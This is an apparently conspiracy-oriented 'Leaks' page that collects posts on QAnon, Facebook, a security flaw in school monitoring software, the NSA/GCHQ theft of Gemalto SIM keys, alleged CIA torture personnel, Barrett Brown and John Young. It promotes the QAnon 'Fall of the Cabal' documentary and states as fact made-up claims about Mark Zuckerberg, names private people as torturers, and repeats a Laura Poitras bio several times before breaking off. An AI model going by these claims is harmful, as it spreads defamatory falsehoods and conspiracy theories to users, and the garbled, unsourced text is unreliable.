Leaks

The Fall of the Cabal – 10 Part Documentary

Aug 4, 2020 | 2020 Relevant, Leaks, Video

This documentary was made by researcher and author Janet Ossebaard from the Netherlands with the aid of countless anons across the world. It Contains thousands of hours of research. Accept nothing as the truth. DO your own research, and double-check everything presented. This is the only way we become independent thinkers.

[00:00] Part 1 – Things that make you go hmmm (length : 13mins06)

[13:06] Part 2 – Down the rabbit hole (length : 14mins58)

[28:07] Part 3 – The alien invasion (length : 16mins21)

[44:28] Part 4 – Child lovers everywhere (length : 16mins14)

[01:00:43] Part 5 – Children, art & pizza (length : 19mins31)

[01:20:14] Part 6 – Major media manipulation (length : 16mins55)

[01:37:09] Part 7 – Witches & warlocks (length : 23mins40)

[02:00:50] Part 8 – Beyond kings & queens (length : 19mins02)

[02:19:50] Part 9 – The dawn of a new world (length : 19mins41)

[02:39:40] Part 10 – The return of the king (length : 18mins35)

Everything you Need to Know

Q and the Great Awakening

The Great Awakening : aka the Q Map

Insider Leaks Statement: Facebook Was NOT Created By Mark Zuckerberg!

Sep 24, 2019 | 2020 Relevant, Globalist Corporations, Leaks, News

Definitely worth a listen! We all know that Facebook had some shady beginnings.. stolen code.. angel investment via outed CIA ‘front company’ In-Q-Tel, and it goes on.. What if Zuck really was just the chosen puppet leader of what would ultimately be the worlds largest ‘voluntary citizen dossier’? Give it a listen and decide for yourself. These statements certainly seem to ring true with plenty of background info to give reasonable merit.

Highlights:

Mark’s real name is not even Zuckerberg.
Mark was chosen ahead of time and ‘placed’ at Harvard to fit the story.
Mark did not create the Facebook brand name nor did he write any code.
Mark has ‘handlers’ that dictated (and still do) his every move.
Mark’s lack of any moral compass made him the perfect figure-head.
Mark is the just the face of a much bigger agenda at work.

Interesting ‘Top Comment’

” So, Zuckerberg’s Harvard professor, James P. Chandler, is one in the same patent attorney who stole Michael McKibben’s Leader Technology ideas that he was supposed to help get a patent and instead STOLE the information! WOW, all these deep stater’s are totally intertwined, like a huge cancer. How do you kill a cancer? STARVE IT! “

Facebook is Likely Just the DARPA LifeLog Project Re-Named

Schools Now Monitoring kids with Insecure Impero Software, PR Issues Abound

Jul 15, 2015 | Black Technology, Leaks

One of the most widely used tools for Schools monitoring kids and restricting pupils’ internet use in UK schools has a serious security flaw which could leave hundreds of thousands of children’s personal information exposed to hackers, a researcher has warned.

Impero Education Pro, a product that restricts and monitors’ students’ website use and searches, is used in 27% of UK secondary schools, according to the company. In a controversial pilot programme, a version of the software looks for extremism-related searches such as “jihadi bride”.

But last month the security researcher Zammis Clark posted extensive details of a flaw in the company’s encryption protocols which could allow almost anyone to gain full access to computers running the Impero software, run software such as spyware on the systems, or access files and records stored on them.

The company said it had released a temporary security patch and was working on a permanent upgrade.

Clark said the flaw he found would leave affected schools’ networks “completely pwned”, online slang meaning in this context that the networks’ security would be fully compromised and information on it would be rendered vulnerable.

He said he had posted it publicly, rather than privately disclosing it to the company, for several reasons. “One was that I was against the ‘anti-extremism’ stuff, the other was because not being a customer, I didn’t know where to send it.”

Schools using Impero’s software said the company had notified them of the security flaw in the middle of last month but they were offered few details of its potential scale.

One school IT manager said the response from Impero was vague and required managers to contact the firm for more information. “Impero are crap at communication,” he said.

Three schools and chains using the software that were approached by the Guardian said the company had been slow to deliver promised software patches. Impero also offered fixes to schools that were using the software without contractual support, but left it up to those schools to make contact.

One school said the most recent update on the situation from Impero arrived by email on Monday.

The company is known on school tech forums for its pushy sales techniques, but the software remains popular because of the lack of quality alternatives.

Impero stressed that no data had been compromised, it had already issued a temporary fix for the vulnerability and it would install a full solution before the start of the next academic year.

“On 13 June 2015, we were made aware that someone had maliciously and illegally hacked our product, subsequently making this hack public rather than bringing it to our attention privately and in confidence. No customers have been affected by this and no data has been leaked or compromised,” it said.

“We immediately released a hot fix, as a short-term measure, to address the issue and since then we have been working closely with our customers and penetration testers to develop a solid long-term solution. All schools will have the new version, including the long-term fix, installed in time for the new school term.”

The company said “the methods used to identify and communicate this particular issue were not legal” and they would take a “firm stance”.

“Impero Education Pro is designed to protect and safeguard children in schools and any attempt to jeopardise this by illegally obtaining and publicising sensitive information will be dealt with appropriately,”it said.

On Monday, a month after Clark first disclosed the software vulnerability, lawyers acting for Impero demanded in a letter that he should remove all of his online postings about the company, under the threat of civil proceedings for breach of confidence and copyright infringement and criminal proceedings under the computer misuse act. The letter admits the potential seriousness of the vulnerability Clark disclosed in schools’ systems.

“By publicising the encryption key on the internet and on social media and other confidential information, you have enabled anyone to breach the security of our client’s software program and write destructive files to disrupt numerous software systems throughout the UK,” it said.

Impero said the hack “could only be exploited if basic network security does not exist” and would require the hacker to be physically present in a school.

Publicly disclosing details of security vulnerabilities is a controversial practice in the online security world. Some believe private disclosure is better initially, as it gives companies time to fix flaws before they are made public, but it rarely results in legal action.

Mustafa al-Bassam, a security engineer and former member of the hacking collective Lulzsec, said the legal threat against Clark was bizarre, especially when such exploits can be used or sold for profit, rather than posted online to be fixed.

“Responding with a legal threat to a security researcher that highlighted a serious security flaw in your software is bizarre and shows utter disregard for customers,” he said.

“Unfortunately it shows a theme that is too common in the software industry: companies view security as an external PR issue because it often affects their customers more than it affects them. And they should be grateful that this security flaw was disclosed publicly instead of being sold to malware developers like Hacking Team.”

Impero’s Education Pro software serves a variety of roles in schools’ systems, including blocking inappropriate web surfing – such as adult sites – and monitoring students’ activity, as well as rationing printing and making IT administration simpler.

However, last month – just days before Clark discovered the flaw – the Guardian reported Impero was offering a new feature to monitor keywords potentially tied to terrorism or extremism before the implementation of new counter-terrorism legislation introducing a requirement on schools to monitor pupils for such signs.

The pilot, introduced in 16 UK schools and five in the US, monitors for phrases such as “YODO” – You Only Die Once – “War on Islam”, and “Storm Front”, a neo-Nazi group.

The Department for Education said: “We have been clear that schools are expected to ensure that sensitive pupil information is held securely. The Data Protection Act of 1998 is clear what standards schools are expected to adhere to and we provide guidance on this.”

sources:

https://TheGuardian.com

https://pdf.yt/d/fRcZ1TWHaDkwz-Ea

Tweets by TheWack0lian

Leaked: NSA Spies Steal Encryption Keys from Global SIM Manufacturer

Feb 25, 2015 | Leaks, News

AMERICAN AND BRITISH Leaked: NSA Spies hacked into the internal computer network of the largest manufacturer of SIM cards in the world, stealing encryption keys used to protect the privacy of cellphone communications across the globe, according to top-secret documents provided to The Intercept by National Security Agency whistleblower Edward Snowden.

The hack was perpetrated by a joint unit consisting of operatives from the NSA and its British counterpart Government Communications Headquarters, or GCHQ. The breach, detailed in a secret 2010 GCHQ document, gave the surveillance agencies the potential to secretly monitor a large portion of the world’s cellular communications, including both voice and data.

The company targeted by the intelligence agencies, Gemalto, is a multinational firm incorporated in the Netherlands that makes the chips used in mobile phones and next-generation credit cards. Among its clients are AT&T, T-Mobile, Verizon, Sprint and some 450 wireless network providers around the world. The company operates in 85 countries and has more than 40 manufacturing facilities. One of its three global headquarters is in Austin, Texas and it has a large factory in Pennsylvania.

In all, Gemalto produces some 2 billion SIM cards a year. Its motto is “Security to be Free.”

With these stolen encryption keys, intelligence agencies can monitor mobile communications without seeking or receiving approval from telecom companies and foreign governments. Possessing the keys also sidesteps the need to get a warrant or a wiretap, while leaving no trace on the wireless provider’s network that the communications were intercepted. Bulk key theft additionally enables the intelligence agencies to unlock any previously encrypted communications they had already intercepted, but did not yet have the ability to decrypt.

As part of the covert operations against Gemalto, spies from GCHQ — with support from the NSA — mined the private communications of unwitting engineers and other company employees in multiple countries.

Gemalto was totally oblivious to the penetration of its systems — and the spying on its employees. “I’m disturbed, quite concerned that this has happened,” Paul Beverly, a Gemalto executive vice president, told The Intercept. “The most important thing for me is to understand exactly how this was done, so we can take every measure to ensure that it doesn’t happen again, and also to make sure that there’s no impact on the telecom operators that we have served in a very trusted manner for many years. What I want to understand is what sort of ramifications it has, or could have, on any of our customers.” He added that “the most important thing for us now is to understand the degree” of the breach.

Leading privacy advocates and security experts say that the theft of encryption keys from major wireless network providers is tantamount to a thief obtaining the master ring of a building superintendent who holds the keys to every apartment. “Once you have the keys, decrypting traffic is trivial,” says Christopher Soghoian, the principal technologist for the American Civil Liberties Union. “The news of this key theft will send a shock wave through the security community.”

THE MASSIVE KEY THEFT IS “BAD NEWS FOR PHONE SECURITY. REALLY BAD NEWS.”

Beverly said that after being contacted by The Intercept, Gemalto’s internal security team began on Wednesday to investigate how their system was penetrated and could find no trace of the hacks. When asked if the NSA or GCHQ had ever requested access to Gemalto-manufactured encryption keys, Beverly said, “I am totally unaware. To the best of my knowledge, no.”

According to one secret GCHQ slide, the British intelligence agency penetrated Gemalto’s internal networks, planting malware on several computers, giving GCHQ secret access. We “believe we have their entire network,” the slide’s author boasted about the operation against Gemalto.

Additionally, the spy agency targeted unnamed cellular companies’ core networks, giving it access to “sales staff machines for customer information and network engineers machines for network maps.” GCHQ also claimed the ability to manipulate the billing servers of cell companies to “suppress” charges in an effort to conceal the spy agency’s secret actions against an individual’s phone. Most significantly, GCHQ also penetrated “authentication servers,” allowing it to decrypt data and voice communications between a targeted individual’s phone and his or her telecom provider’s network. A note accompanying the slide asserted that the spy agency was “very happy with the data so far and [was] working through the vast quantity of product.”

The Mobile Handset Exploitation Team (MHET), whose existence has never before been disclosed, was formed in April 2010 to target vulnerabilities in cellphones. One of its main missions was to covertly penetrate computer networks of corporations that manufacture SIM cards, as well as those of wireless network providers. The team included operatives from both GCHQ and the NSA.

While the FBI and other U.S. agencies can obtain court orders compelling U.S.-based telecom companies to allow them to wiretap or intercept the communications of their customers, on the international front this type of data collection is much more challenging. Unless a foreign telecom or foreign government grants access to their citizens’ data to a U.S. intelligence agency, the NSA or CIA would have to hack into the network or specifically target the user’s device for a more risky “active” form of surveillance that could be detected by sophisticated targets. Moreover, foreign intelligence agencies would not allow U.S. or U.K. spy agencies access to the mobile communications of their heads of state or other government officials.

“It’s unbelievable. Unbelievable,” said Gerard Schouw, a member of the Dutch Parliament, when told of the spy agencies’ actions. Schouw, the intelligence spokesperson for D66, the largest opposition party in the Netherlands, told The Intercept, “We don’t want to have the secret services from other countries doing things like this.” Schouw added that he and other lawmakers will ask the Dutch government to provide an official explanation and to clarify whether the country’s intelligence services were aware of the targeting of Gemalto, whose official headquarters is in Amsterdam.

Last November, the Dutch government proposed an amendment to its constitution to include explicit protection for the privacy of digital communications, including those made on mobile devices. “We have, in the Netherlands, a law on the [activities] of secret services. And hacking is not allowed,” Schouw said. Under Dutch law, the interior minister would have to sign off on such operations by foreign governments’ intelligence agencies. “I don’t believe that he has given his permission for these kind of actions.”

The U.S. and British intelligence agencies pulled off the encryption key heist in great stealth, giving them the ability to intercept and decrypt communications without alerting the wireless network provider, the foreign government or the individual user that they have been targeted. “Gaining access to a database of keys is pretty much game over for cellular encryption,” says Matthew Green, a cryptography specialist at the Johns Hopkins Information Security Institute. The massive key theft is “bad news for phone security. Really bad news.”

…Continued at Firstlook.org

CIA Torture Pseudonyms

Dec 11, 2014 | Government Agenda, Leaks, News

via Cryptome.org 11 December 2014

CIA Torture Pseudonyms

Paulmd199 sends:

CIA Torture Pseudonyms Update: The “Associates” of “Company Y” are now known, as is “CIA officer 2.” Additional people and details have become known.

The press has been hard at work uncovering the pseudonyms used and nailing down the true identities of the site. I compile them here.

The most important outstanding questions: who are Detainees “R” & “S,” and where is detention site “red?” While I feel pretty strongly about redacting the names of low-level personnel from the NSA slides, which are technical in nature, I have zero interest in protecting torturers. The public has a right to know where these black sites were, and the detainees deserve a name and a fair trial.

Detention sites:

BLACK – RomaniaBLUE – “Quartz” – Stare Kiejkuty, Poland

BROWN – Afghanistan

COBALT – “Salt Pit” – Afghanistan

GRAY – Afghanistan

GREEN – Thailand

INDIGO – Guantanamo

MAROON – Guantanamo

ORANGE – Afghanistan

VIOLET – Lithuania

RED – This could be an additional site in one of the above countries, or someplace entirely different. It is mentioned only once in the report, on page 140 of 499, and the entry is almost entirely redacted.

Companies:

Company Y – Mitchell, Jessen & Associates, based in Spokane, Washington.The “Associates” are David Ayers, Randall Spivey, James Sporleder, Joseph Matarazzo, and Roger Aldrich.

It should be noted that there is no “Company X” in this report, I found this peculiar. It seems that there should be one, and as it happens there are several shady “Companies’ known: “Premier Executive Transport Services” Incorporated in Dedham Massachusetts, is known to have been part of the CIA rendition program. The names of its officers include “Coleen Bornt,” “Brian Dice” and “Tyler Edward Tate.” These are fictitious people.

Other companies suspected of involvement in rendition include: “Stevens Express Leasing” “Richmor Aviation” “Rapid AirTrans” “Path Corporation”

Businesses:

Business Q – Associated with Zubair, associated with Hambali

Torture Doctors:

“Grayson Swigert” – James Mitchell”Hammond Dunbar” – Bruce Jessen

CIA Officers:

CIA Officer 1 – COBALT Site manager – Matthew Zirbel. Zirbel’s corrupt CIA boss (Convicted) Kyle “Dusty” Dustin Foggo overruled the 10 day suspension Zirbel received in the murder of Gul Rahman (innocent).CIA Officer 2 – Torturer at COBALT and BLUE – Albert El Gamil – retired from CIA in 2004.

[Redacted] – Ron Czarnetsky, CIA Chief of Station on Warsaw, Poland from 2002 to 2005. This would make him responsible for site BLUE.

[no mention] Alfreda Frances Bikowsky – Made herself involved in Waterboarding in Poland (BLUE) in March of 2003. Took trip unassigned and on own dime. Was “scolded” and told it “wasn’t supposed to be entertainment.” Would have been there at the same time as Mitchell and Jessen.

Assets:

Asset X – Directly involved in the capture of KSM.Asset Y – Reports on Janat Gul

Persons:

Person 1 – al-Ghuraba group member, with an interest in airplanes and aviation. “intelligence indicates the interest was unrelated to terrorist activity.”

Detainees:

Detainee R – Held by foreign government, rendered to CIA custodyDetainee S – Held by foreign government

Sources:

http://www.businessinsider.com/the-company-behind-cia-torture-2014-12 http://www.washingtonpost.com/blogs/worldviews/wp/2014/12/09/decoding-the-secret-black-sites-on-the-senates-report-on-the-cia-interrogation-program/

http://www.reuters.com/article/2014/12/10/us-usa-cia-torture-lithuania-idUSKBN0JO18M20141210

http://www.nytimes.com/2014/12/11/world/cia-torture-report-draws-world-reaction.html?smid=tw-share&_r=0

http://www.historycommons.org/entity.jsp?entity=zirbel_1

https://news.vice.com/video/the-architect?utm_source=vicenewsfb

http://www.wbrz.com/news/psychologist-defends-harsh-cia-interrogations/

http://www.nbcnews.com/storyline/cia-torture-report/cia-paid-torture-teachers-more-80-million-n264756

https://www.youtube.com/watch?v=SDxue3jGAug#t=541

https://firstlook.org/theintercept/2014/12/15/charmed-life-cia-torturer/

http://www.propublica.org/article/disgraced-senior-cia-official-heads-to-prison-still-claiming-hes-a-patriot

http://cryptocomb.org/?p=421

https://www.youtube.com/watch?v=ih1GgxOoSZ8

Barrett Brown – Journalist, Activist

Dec 11, 2014 | 2020 Relevant, Leaks, Whistleblowers & Dissidents

Barrett Brown is an American journalist, essayist and satirist. He is often referred to as an unofficial spokesperson for the hacktivist collective Anonymous, a label he disputes. He is credited with the creation of Project PM, a research outfit and information collective determined to expose agents of the corporate military spying apparatus. Brown’s large vocabulary and quick wit often make his thoughts a joy to read.

The Barrett Brown Review of Arts and Letters and Jail: A Funny Thing Happened on the Way to the Prison

The seven guys with whom I recently spent two months living in a small room at the Kaufman County Jail while awaiting transfer were in the distressing habit of compulsively watching local TV news, which is the lowest form of news. They would even watch more than one network’s evening news program in succession, presumably so as to get differing perspectives on the day’s suburban house fires and rush-hour lane closings rather than having to view these events through a single ideological prism.

One day, there was a report about a spate of bank robberies by a fellow the media was dubbing the Lunch Money Bandit after his habit of always striking around noon, when tellers were breaking for lunch. Later that week, there was another report on the suspect, accompanied by surveillance footage — and then, shortly afterward, he was actually brought in to our cell, having just been captured when the cops received a tip from a former accomplice who’d been picked up on unrelated charges.

Lunch Money was an affable twentysomething guy from New Orleans who’d lost his two front teeth fighting off a couple of assailants who’d tried to rob his family’s motel room after Katrina and had already done four years in federal prison for other bank robberies. He would have gladly taken a real job if he’d been able to find one, he said. Still, he conceded, “I just love robbing banks.” I couldn’t imagine what there is to love about such a career; this isn’t the old days when a bank robbery entailed brandishing a Tommy gun, dynamiting a safe, and tearing off in a stolen Model T roadster with your hard-drinking flapper girlfriend and a dozen cloth sacks adorned with dollar sign symbols. These guys today just sort of walk up to the teller and hand over a note to the effect that they have a gun (which they don’t — going armed carries a more serious charge, and there’s no point in bringing a gun to a bank that’s federally insured, even in Texas).

Drug dealers find bank robbers to be fascinating eccentrics and tend to pepper them with questions. One cocaine entrepreneur asked Lunch Money, “What if, like, when you handed her the note, the bitch just laughed in your face?”

“Man, that’d be fucked up,” he replied thoughtfully, visibly shaken by this potential revolution in human affairs.

One night, as we all lay in our bunks discussing the wicked world, Lunch Money proclaimed that Magic Johnson had never actually had HIV and that the whole thing had merely been a plot by the CIA, which had paid him handsomely to fake it so that he could later pretend to “recover” and the U.S. medical establishment could take credit for having developed such effective HIV treatments. As evidence, he noted that Johnson was inexplicably worth over a billion dollars. I debated with him about this for an hour. I’m not too bothered by my five-year prison sentence, as it will be neat to get out when it’s over and see to what extent video game graphics have improved while I was away, but I sure would like to get back the hour I spent arguing about Magic Johnson’s HIV status with the fucking Lunch Money Bandit.

***

The other day I was woken up at 4:30 am, escorted to a small, bare room, strip-searched, put in handcuffs and leg shackles, had a heavy chain wrapped around my midsection, and placed in the back of a dark and cage-lined van that looked like something from one of those Saw movies. But this was good news. It meant that, having recently gotten my ludicrous sentence, I’d now been “designated.” A crack team of specially trained federal prison picker-outers had chosen a facility for me. I was now to begin the multi-stage pilgrimage to the particular compound where I’ll be spending the next one to two years, depending on whether I get into any further trouble (so, two years).

For the majority of federal defendants, this Prisoner’s Progress, as I’m pleased to call it, entails “catching chain,” or being put on the weekly prison bus and taken to the federal inmate processing facility in Oklahoma, where the federal government has been sending its victims since the Trail of Tears. They’ll spend a week or so there before being shipped in turn to their designated prison. Prisons being far more humane than the amusingly horrid little detention centers where most inmates facing charges are kept until they inevitably give in and plea to a crime, this journey is viewed with fond anticipation by federal prisoners, who thus constitute the only population in human history among which it is common to be excited about the prospect of going to Oklahoma.

As for me, I’d rather rip off my own balls and mail them to Stratfor as restitution than set foot in a third-rate state like Oklahoma, regardless of what wonders may lie at the end of that particular rainbow, so it’s a fine thing that I was just going down the road to the Fort Worth Federal Correctional Institution, which will be my home for the next, er, two years. I know little of Fort Worth other than that it’s a lawless haven for half-caste Indian fighters and shiftless part-time cowhands looking to blow their greenbacks and Comanche scalps at one of the town’s countless Chinese-run opium dens, nor am I bothered by the possibility that what little I do know about the town may be 130 years out of date and racist. But I specifically requested that I be sent to this benighted city’s federal prison. For one thing, I’d already “toured the campus,” as it were, shortly after my arrest, when I spent two months at FCI Fort Worth’s jail unit so that the resident psychologists could subject me to a competency evaluation. (Based on their report, Judge Sam Lindsay declared me competent to participate in a trial, which is more than I can say for Judge Sam Lindsay.)

Fort Worth is also the only federal prison aside from FCI Seagoville that’s located near Dallas, and I’m pretty sure I’m still banned from that one, as noted in a prior column, and naturally I want to be close to my parents so that they can visit me with some regularity. My mom, a writer and editor and former flight attendant and South Texas beauty queen who once took me on a vacation to see a swimming pig at a place called Aquarena Springs, is a valuable fountainhead of media gossip, including which outlets are currently going down in flames (The New Republic, as it turns out), and always makes sure to let me know whether and to what extent my haircut is inadequate. Sometimes, if I happen to have a pimple, she insists on popping it right then and there in the visiting room, right in front of the other criminals. Note that I am 33 years old and, arguably, a hardened convict.

Likewise, my dad is my chief source of information regarding plot developments in what I gather to be a popular television program called The Blacklist, new episodes of which he details to me at great length at every opportunity, although I have never asked him for these reports or expressed any interest in the show whatsoever. Incidentally, when I was a kid, he took me on five different occasions to see a film called Hard Target in which the protagonist, ably portrayed by Jean Claude van Damme, finds himself hunted for sport by a wealthy fellow and his mercenary squad of professional trackers, all of whom he ends up killing in turn. My dad also gave me a promotional poster for this movie and, for years afterward, would turn to me and solemnly proclaim the film’s tagline, “Don’t hunt what you can’t kill,” which I suppose is as good advice as any.

Last time he came for a visit, he began to relate to me, apropos of nothing, the nature and potential killing power of some sort of subterranean supervolcano located at Yellowstone and the general circumstances under which it will someday explode and kill a great majority of North Americans, an event which he prophesied with obvious relish. It’s not that he’s one of those ecological mystics who despise humanity and long to see Mother Earth fight back against the ravages of industrial sentience or some such irritating thing. Quite the contrary. In my younger days, he would often drag me around East Texas and command me to assassinate deer and wild boars with rifles he would supply for the purpose, even though I had no ideological differences with any of these animals, and one time, when I was 17, he took me to East Africa to help him exploit the resident natural resources alongside a group of ex-military adventurers with whom we had somehow managed to attach ourselves (this expedition failed rather spectacularly), and lately he seems to have gotten involved in fracking. So he’s certainly no partisan of Nature. It’s just that he’s fond of power in its rawest forms, and if he smiles at the prospect of 400 million deaths, it is only because he feels that man is insufficiently reverent of this particular supervolcano, this god-made-manifest, which therefore has no choice but to lash out against us as punishment. He’s also a longtime pillar of the Dallas Safari Club and on at least one occasion of which I am aware was literally almost eaten by a lion. I could go on and on. Thankfully my parents are divorced, and so I usually only have to deal with these hyperactive Southern Gothic archetypes one at a time these days. Occasionally, though, they set aside their differences in order to come harass me together, and I eventually emerge from the visitation room looking haunted.

I wasn’t taken straight to Fort Worth from Kaufman County, as that would be too quick and easy and cost effective, the prison being less than a half-hour’s drive away; rather, I was taken to the federal courthouse in downtown Dallas to wait for another ride to the Mansfield jail, where I’d already spent much of 2013, and from which I’d eventually be taken to Fort Worth next time a U.S. Marshal happened to be going in that general direction. At the end of the day’s no doubt majestic federal court proceedings, I was placed back in the chew-your-arm-off-and-only-then-shall-I-give-you-the-key van for the ride over to Mansfield. In the rusty cage next to mine were two girls, shackled like I was, who had been to court that afternoon. One had been crying; she’d just been sentenced to eight years for conspiracy to distribute marijuana despite having originally been given reason to expect considerably less time, as she’d cooperated with the FBI. The agents had clearly found her testimony helpful, as they’d met with her a second time, but nonetheless they’d neglected to ask the judge for the sentence reduction they’d promised her in exchange. Like most drug dealers, this girl was in the habit of making and keeping bargains on the strength of her word and expected others to do likewise, but then she’d never dealt with the FBI before.

Just as she finished sobbing out her story, something rather incredible happened: the U.S. Marshal who was driving us back to the jail, having been listening to this account, apparently decided that he was sick of serving as another cog in a fascist system that literally places females in chains and ruins their lives over consensual non-crimes like selling marijuana, because he pulled over, stepped out of the van, came around the back, unlocked the girl’s cage, removed her chains and leg irons and handcuffs, gave her all the cash he had on him, kissed her on the forehead, and advised her to hitchhike to Mexico and then catch a flight to Europe, where she’d have another chance at life, far away from the all-seeing state that had sought to deprive her of her youth and freedom.

Just kidding. Actually he drove us to the jail while the girl cried in her cage.

***

Quote of the Day:

“Truth does not often escape from palaces.” —William Durant

***

Editor’s note: Barrett Brown has been incarcerated since September 2012. Go here to read earlier installments of “The Barrett Brown Review of Arts and Letters and Jail.” If you’d like to send him a book, here’s his Amazon wish list.

Barrett Brown #45047-177
FCI Fort Worth
P.O. Box 15330
Fort Worth, TX 76119

John Young – Architect, Blogger, Activist

Dec 9, 2014 | 2020 Relevant, Leaks, Whistleblowers & Dissidents

John Young Architect, Cryptologist, Leak Facilitator, Cryptome.org Founder

John Young is a wise, seasoned, and ‘angry’ citizen determined to expose corruption and abhorrent secrecy. He is currently living in New York, doing architectural work for some of the most powerful members of the political establishment that he has sworn to attack. “It’s an easy way to make money in New York, to do corrupt work,” he says with a shrug.

Young on .gov tactics:

“Assassination Politics,” is what Young described as “an imaginative and sophisticated prospective for improving governmental accountability by way of a scheme for anonymous, untraceable political assassination.”

Interesting, Young disclosed the fact on Cryptome in 2000:

“My father-in-law was a longtime career officer in the Central Intelligence Agency, one of its earliest members, and chief of station in several countries…. He’s not talking to Cryptome, and that’s regrettable, for I believe such knowledgeable persons should disclose everything they know about the global culture of secret intelligence and its profound effects – to better inform citizens on the true way their governments function.”

Cryptome.org

Cryptome warns visitors that it does not promise security, that is responsibility of visitors. To not believe security promises by others.

Cryptome Public Key 11 June 2013. New PK for cryptome[at]earthlink.net
Key ID: 0x8B3BF75C

—–BEGIN PGP PUBLIC KEY BLOCK—–
Version: PGP Universal 2.9.1 (Build 347)

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
ySZ+3dIlBIbIaHXQCE4ES8wW0JgtaA==
=gjKZ
—–END PGP PUBLIC KEY BLOCK—–

John Young Architect: http://jya.nyc
Special Inspections: http://jya.nyc/special-inspections.htm

Laura Poitras – Journalist, Filmmaker

Dec 9, 2014 | Leaks, Whistleblowers & Dissidents

Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called ‘CITIZENFOUR’ which explains how it all unfolded.Laura Poitras is an American documentary film director and producer residing in Berlin. Poitras has received numerous awards for her work. Her 2006 documentary, My Country, My Country, was nominated for an Academy Award. Edward Snowden first reached out to Laura with the classified info, and she has made a documentary called 